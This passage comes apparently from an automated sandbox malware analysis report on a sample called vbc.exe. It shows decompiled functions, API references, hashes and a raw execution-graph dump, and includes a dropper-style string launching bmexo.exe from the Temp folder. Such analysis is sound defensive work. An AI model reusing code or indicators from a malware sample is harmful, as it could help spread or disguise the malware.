					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}



















                                          0x00404e80
                                          0x00404e85
                                          0x00404e8d
                                          0x00404e8e
                                          0x00404e9b
                                          0x00404ea3
                                          0x00404ea4
                                          0x00404ea6
                                          0x00404ea8
                                          0x00404eaa
                                          0x00404ead
                                          0x00404ead
                                          0x00404eb4
                                          0x00404eba
                                          0x00404eba
                                          0x00404ec1
                                          0x00404ec8
                                          0x00404ecb
                                          0x00404ece
                                          0x00404ece
                                          0x00404ed2
                                          0x00404ee2
                                          0x00404ee4
                                          0x00404ee7
                                          0x00404e90
                                          0x00404e90
                                          0x00404e97
                                          0x00404e97
                                          0x00404eef
                                          0x00404efa
                                          0x00404f10
                                          0x00404f21
                                          0x00404f3d

                                          APIs
                                          • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                          • wsprintfW.USER32 ref: 00404F21
                                          • SetDlgItemTextW.USER32 ref: 00404F34
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                          • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                                          • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                          • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                          0x00405f3e
                                          0x00405f4b
                                          0x00405f4c
                                          0x00405f57
                                          0x00405f5f
                                          0x00405f5f
                                          0x00405f67

                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                                          • CharPrevW.USER32(?,00000000), ref: 00405F4D
                                          • lstrcatW.KERNEL32 ref: 00405F5F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}





                                          0x00405648
                                          0x00405652
                                          0x0040566e
                                          0x00405690
                                          0x00405693
                                          0x00405699
                                          0x004056a3
                                          0x004056a4
                                          0x004056a6
                                          0x004056ac
                                          0x004056ac
                                          0x004056b6
                                          0x00000000
                                          0x004056c4
                                          0x0040567b
                                          0x004056b3
                                          0x004056b3
                                          0x00000000
                                          0x004056b3
                                          0x00405687
                                          0x00405689
                                          0x00000000
                                          0x00405689
                                          0x00405658
                                          0x00000000
                                          0x00000000
                                          0x0040565f
                                          0x00000000

                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00405673
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                                            • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                          • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                                          • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                          • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                          0x0040654a
                                          0x0040654c
                                          0x00406564
                                          0x00406569
                                          0x0040656e
                                          0x004065ac
                                          0x004065ac
                                          0x00406570
                                          0x00406582
                                          0x0040658d
                                          0x00406593
                                          0x0040659e
                                          0x00000000
                                          0x00000000
                                          0x0040659e
                                          0x004065b2

                                          APIs
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
                                          • RegCloseKey.ADVAPI32(?), ref: 0040658D
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya, xrefs: 00406543
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 3356406503-3751928542
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                          0x004060d3
                                          0x004060d5
                                          0x004060d8
                                          0x00406104
                                          0x004060dd
                                          0x004060e6
                                          0x004060eb
                                          0x004060f6
                                          0x004060f9
                                          0x00406115
                                          0x004060fb
                                          0x00406102
                                          0x00000000
                                          0x00406102
                                          0x0040610e
                                          0x00406112
                                          0x00406112
                                          0x0040610c
                                          0x00000000

                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                                          • CharNextA.USER32(00000000), ref: 004060FC
                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                          • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:11.5%
                                          Dynamic/Decrypted Code Coverage:5.3%
                                          Signature Coverage:8.9%
                                          Total number of Nodes:1733
                                          Total number of Limit Nodes:108
                                          execution_graph 7827 f26470 RtlUnwind 7828 f246f1 7829 f24869 __calloc_crt 58 API calls 7828->7829 7830 f246fb EncodePointer 7829->7830 7831 f24714 7830->7831 7832 f27577 7833 f217be __lock 58 API calls 7832->7833 7834 f2757e 7833->7834 8057 f21737 8060 f23ec8 8057->8060 8059 f2173c 8059->8059 8061 f23eeb 8060->8061 8062 f23ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8060->8062 8061->8062 8063 f23eef 8061->8063 8062->8063 8063->8059 8064 f21f37 8071 f258ce 8064->8071 8067 f21f4a 8069 f24831 _free 58 API calls 8067->8069 8070 f21f55 8069->8070 8084 f258d7 8071->8084 8073 f21f3c 8073->8067 8074 f25787 8073->8074 8075 f25793 __wsopen_helper 8074->8075 8076 f2442f __lock 58 API calls 8075->8076 8080 f2579f 8076->8080 8077 f25804 8114 f2581b 8077->8114 8079 f25810 __wsopen_helper 8079->8067 8080->8077 8081 f257d8 DeleteCriticalSection 8080->8081 8101 f27c39 8080->8101 8083 f24831 _free 58 API calls 8081->8083 8083->8080 8085 f258e3 __wsopen_helper 8084->8085 8086 f2442f __lock 58 API calls 8085->8086 8093 f258f2 8086->8093 8087 f25990 8097 f259b2 8087->8097 8089 f21f9d _flsall 59 API calls 8089->8093 8090 f2599c __wsopen_helper 8090->8073 8092 f25824 82 API calls __fflush_nolock 8092->8093 8093->8087 8093->8089 8093->8092 8094 f2597f 8093->8094 8095 f22007 __getstream 2 API calls 8094->8095 8096 f2598d 8095->8096 8096->8093 8100 f24599 LeaveCriticalSection 8097->8100 8099 f259b9 8099->8090 8100->8099 8102 f27c45 __wsopen_helper 8101->8102 8103 f27c71 8102->8103 8104 f27c59 8102->8104 8107 f21f5e __lock_file 59 API calls 8103->8107 8110 f27c69 __wsopen_helper 8103->8110 8105 f21cc3 _memcpy_s 58 API calls 8104->8105 8106 f27c5e 8105->8106 8108 f21e89 _memcpy_s 9 API calls 8106->8108 8109 f27c83 8107->8109 8108->8110 8117 f27bcd 8109->8117 8110->8080 8176 f24599 LeaveCriticalSection 8114->8176 8116 f25822 8116->8079 8118 f27bdc 8117->8118 8120 f27bf0 8117->8120 8119 f21cc3 _memcpy_s 58 API calls 8118->8119 8122 f27be1 8119->8122 8121 f27bec 8120->8121 8136 f2586a 8120->8136 8133 f27ca8 8121->8133 8124 f21e89 _memcpy_s 9 API calls 8122->8124 8124->8121 8128 f22873 __filbuf 58 API calls 8129 f27c0a 8128->8129 8146 f288a3 8129->8146 8131 f27c10 8131->8121 8132 f24831 _free 58 API calls 8131->8132 8132->8121 8134 f21fcd __wfsopen 2 API calls 8133->8134 8135 f27cae 8134->8135 8135->8110 8137 f2587d 8136->8137 8141 f258a1 8136->8141 8138 f22873 __filbuf 58 API calls 8137->8138 8137->8141 8139 f2589a 8138->8139 8140 f27d99 __write 78 API calls 8139->8140 8140->8141 8142 f2914b 8141->8142 8143 f27c04 8142->8143 8144 f29158 8142->8144 8143->8128 8144->8143 8145 f24831 _free 58 API calls 8144->8145 8145->8143 8147 f288af __wsopen_helper 8146->8147 8148 f288d3 8147->8148 8149 f288bc 8147->8149 8150 f2895e 8148->8150 8152 f288e3 8148->8152 8151 f21c8f __commit 58 API calls 8149->8151 8153 f21c8f __commit 58 API calls 8150->8153 8154 f288c1 8151->8154 8156 f28901 8152->8156 8157 f2890b 8152->8157 8158 f28906 8153->8158 8155 f21cc3 _memcpy_s 58 API calls 8154->8155 8168 f288c8 __wsopen_helper 8155->8168 8159 f21c8f __commit 58 API calls 8156->8159 8160 f26c88 ___lock_fhandle 59 API calls 8157->8160 8161 f21cc3 _memcpy_s 58 API calls 8158->8161 8159->8158 8162 f28911 8160->8162 8163 f2896a 8161->8163 8164 f28924 8162->8164 8165 f2892f 8162->8165 8166 f21e89 _memcpy_s 9 API calls 8163->8166 8167 f2897e __close_nolock 61 API calls 8164->8167 8169 f21cc3 _memcpy_s 58 API calls 8165->8169 8166->8168 8170 f2892a 8167->8170 8168->8131 8169->8170 8172 f28956 8170->8172 8175 f2702e LeaveCriticalSection 8172->8175 8174 f2895c 8174->8168 8175->8174 8176->8116 7835 f233fc 7836 f23431 7835->7836 7838 f2340c 7835->7838 7838->7836 7842 f24961 7838->7842 7843 f2496d __wsopen_helper 7842->7843 7844 f236db __setmbcp 58 API calls 7843->7844 7847 f24972 7844->7847 7848 f27580 7847->7848 7859 f249b3 DecodePointer 7848->7859 7850 f27585 7854 f27590 7850->7854 7860 f249dc 7850->7860 7852 f2759a IsProcessorFeaturePresent 7855 f275a5 7852->7855 7853 f2187c _raise 58 API calls 7856 f275c2 7853->7856 7854->7852 7858 f275b8 7854->7858 7857 f21d2c __call_reportfault 7 API calls 7855->7857 7857->7858 7858->7853 7859->7850 7868 f249e8 __wsopen_helper 7860->7868 7861 f24a52 7866 f24a2f DecodePointer 7861->7866 7867 f24a61 7861->7867 7862 f24a19 7864 f236f3 __getptd_noexit 58 API calls 7862->7864 7865 f24a1e _siglookup 7864->7865 7871 f24abf 7865->7871 7873 f2187c _raise 58 API calls 7865->7873 7880 f24a27 __wsopen_helper 7865->7880 7866->7865 7869 f21cc3 _memcpy_s 58 API calls 7867->7869 7868->7861 7868->7862 7868->7866 7870 f24a15 7868->7870 7872 f24a66 7869->7872 7870->7862 7870->7867 7875 f2442f __lock 58 API calls 7871->7875 7878 f24aca 7871->7878 7874 f21e89 _memcpy_s 9 API calls 7872->7874 7873->7871 7874->7880 7875->7878 7876 f24b2c EncodePointer 7877 f24aff 7876->7877 7881 f24b5d 7877->7881 7878->7876 7878->7877 7880->7854 7882 f24b61 7881->7882 7883 f24b68 7881->7883 7885 f24599 LeaveCriticalSection 7882->7885 7883->7880 7885->7883 7886 f22460 7887 f22497 7886->7887 7888 f2248a 7886->7888 7890 f25770 __crtLCMapStringA_stat 6 API calls 7887->7890 7889 f25770 __crtLCMapStringA_stat 6 API calls 7888->7889 7889->7887 7893 f224a7 __except_handler4 7890->7893 7891 f22574 __except_handler4 7892 f225bf 7891->7892 7894 f225af 7891->7894 7895 f25770 __crtLCMapStringA_stat 6 API calls 7891->7895 7893->7891 7893->7892 7898 f224fe __IsNonwritableInCurrentImage 7893->7898 7896 f25770 __crtLCMapStringA_stat 6 API calls 7894->7896 7895->7894 7896->7892 7904 f22722 RtlUnwind 7898->7904 7899 f225d6 7901 f25770 __crtLCMapStringA_stat 6 API calls 7899->7901 7900 f2253c __except_handler4 7900->7899 7902 f25770 __crtLCMapStringA_stat 6 API calls 7900->7902 7903 f225e6 __except_handler4 7901->7903 7902->7899 7904->7900 8177 f235a6 8179 f235b2 __wsopen_helper 8177->8179 8178 f236ba __wsopen_helper 8179->8178 8180 f235cb 8179->8180 8182 f24831 _free 58 API calls 8179->8182 8181 f235da 8180->8181 8183 f24831 _free 58 API calls 8180->8183 8184 f235e9 8181->8184 8185 f24831 _free 58 API calls 8181->8185 8182->8180 8183->8181 8186 f235f8 8184->8186 8187 f24831 _free 58 API calls 8184->8187 8185->8184 8188 f23607 8186->8188 8190 f24831 _free 58 API calls 8186->8190 8187->8186 8189 f23616 8188->8189 8191 f24831 _free 58 API calls 8188->8191 8192 f23625 8189->8192 8193 f24831 _free 58 API calls 8189->8193 8190->8188 8191->8189 8194 f23637 8192->8194 8195 f24831 _free 58 API calls 8192->8195 8193->8192 8196 f2442f __lock 58 API calls 8194->8196 8195->8194 8199 f2363f 8196->8199 8197 f23662 8209 f236c6 8197->8209 8199->8197 8201 f24831 _free 58 API calls 8199->8201 8201->8197 8202 f2442f __lock 58 API calls 8207 f23676 ___removelocaleref 8202->8207 8203 f236a7 8212 f236d2 8203->8212 8206 f24831 _free 58 API calls 8206->8178 8207->8203 8208 f2715c ___freetlocinfo 58 API calls 8207->8208 8208->8203 8215 f24599 LeaveCriticalSection 8209->8215 8211 f2366f 8211->8202 8216 f24599 LeaveCriticalSection 8212->8216 8214 f236b4 8214->8206 8215->8211 8216->8214 7905 f216e7 7906 f216f6 7905->7906 7907 f216fc 7905->7907 7908 f2187c _raise 58 API calls 7906->7908 7911 f217da 7907->7911 7908->7907 7910 f21701 __wsopen_helper 7912 f21932 _doexit 58 API calls 7911->7912 7913 f217e5 7912->7913 7913->7910 8217 f29624 8218 f2962c __cfltcvt_init 8217->8218 8219 f29637 8218->8219 8221 f2b3ca 8218->8221 8227 f2c2af 8221->8227 8223 f2b3dd 8224 f2b3e4 8223->8224 8225 f21e99 __invoke_watson 8 API calls 8223->8225 8224->8219 8226 f2b3f0 8225->8226 8228 f2c2cb __control87 8227->8228 8230 f2c2eb __control87 8227->8230 8229 f21cc3 _memcpy_s 58 API calls 8228->8229 8231 f2c2e1 8229->8231 8230->8223 8232 f21e89 _memcpy_s 9 API calls 8231->8232 8232->8230 8233 f2b2a9 8236 f2b2c1 8233->8236 8237 f2b2d2 8236->8237 8238 f2b2eb 8236->8238 8242 f29549 8237->8242 8251 f295d7 8238->8251 8241 f2b2bc 8243 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8242->8243 8244 f2956d 8243->8244 8254 f2a184 8244->8254 8249 f25770 __crtLCMapStringA_stat 6 API calls 8250 f295d3 8249->8250 8250->8241 8266 f294a5 8251->8266 8255 f2a1cc 8254->8255 8261 f2a1dc ___mtold12 8254->8261 8256 f21cc3 _memcpy_s 58 API calls 8255->8256 8257 f2a1d1 8256->8257 8258 f21e89 _memcpy_s 9 API calls 8257->8258 8258->8261 8259 f25770 __crtLCMapStringA_stat 6 API calls 8260 f29585 8259->8260 8262 f296a0 8260->8262 8261->8259 8265 f296f8 8262->8265 8263 f25770 __crtLCMapStringA_stat 6 API calls 8264 f29592 8263->8264 8264->8249 8265->8263 8267 f24bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8266->8267 8268 f294d2 8267->8268 8269 f2a184 ___strgtold12_l 58 API calls 8268->8269 8270 f294ea 8269->8270 8275 f29c12 8270->8275 8273 f25770 __crtLCMapStringA_stat 6 API calls 8274 f29545 8273->8274 8274->8241 8278 f29c6a 8275->8278 8276 f25770 __crtLCMapStringA_stat 6 API calls 8277 f29507 8276->8277 8277->8273 8278->8276 8279 f2a92c 8282 f2a94d 8279->8282 8281 f2a948 8283 f2a9b7 8282->8283 8284 f2a958 8282->8284 8350 f2ae9e 8283->8350 8284->8283 8286 f2a95d 8284->8286 8288 f2a962 8286->8288 8289 f2a97b 8286->8289 8287 f2a99c 8287->8281 8296 f2b058 8288->8296 8290 f2a99e 8289->8290 8293 f2a985 8289->8293 8337 f2a9d3 8290->8337 8315 f2b119 8293->8315 8367 f2c11f 8296->8367 8299 f2b09d 8302 f2b0b5 8299->8302 8303 f2b0a5 8299->8303 8300 f2b08d 8301 f21cc3 _memcpy_s 58 API calls 8300->8301 8304 f2b092 8301->8304 8379 f2bfa7 8302->8379 8305 f21cc3 _memcpy_s 58 API calls 8303->8305 8308 f21e89 _memcpy_s 9 API calls 8304->8308 8306 f2b0aa 8305->8306 8309 f21e89 _memcpy_s 9 API calls 8306->8309 8311 f2b099 8308->8311 8309->8311 8310 f2b0e8 8310->8311 8388 f2af6c 8310->8388 8313 f25770 __crtLCMapStringA_stat 6 API calls 8311->8313 8314 f2a976 8313->8314 8314->8281 8316 f2c11f __fltout2 58 API calls 8315->8316 8317 f2b147 8316->8317 8318 f2b161 8317->8318 8319 f2b14e 8317->8319 8321 f2b169 8318->8321 8322 f2b17c 8318->8322 8320 f21cc3 _memcpy_s 58 API calls 8319->8320 8323 f2b153 8320->8323 8324 f21cc3 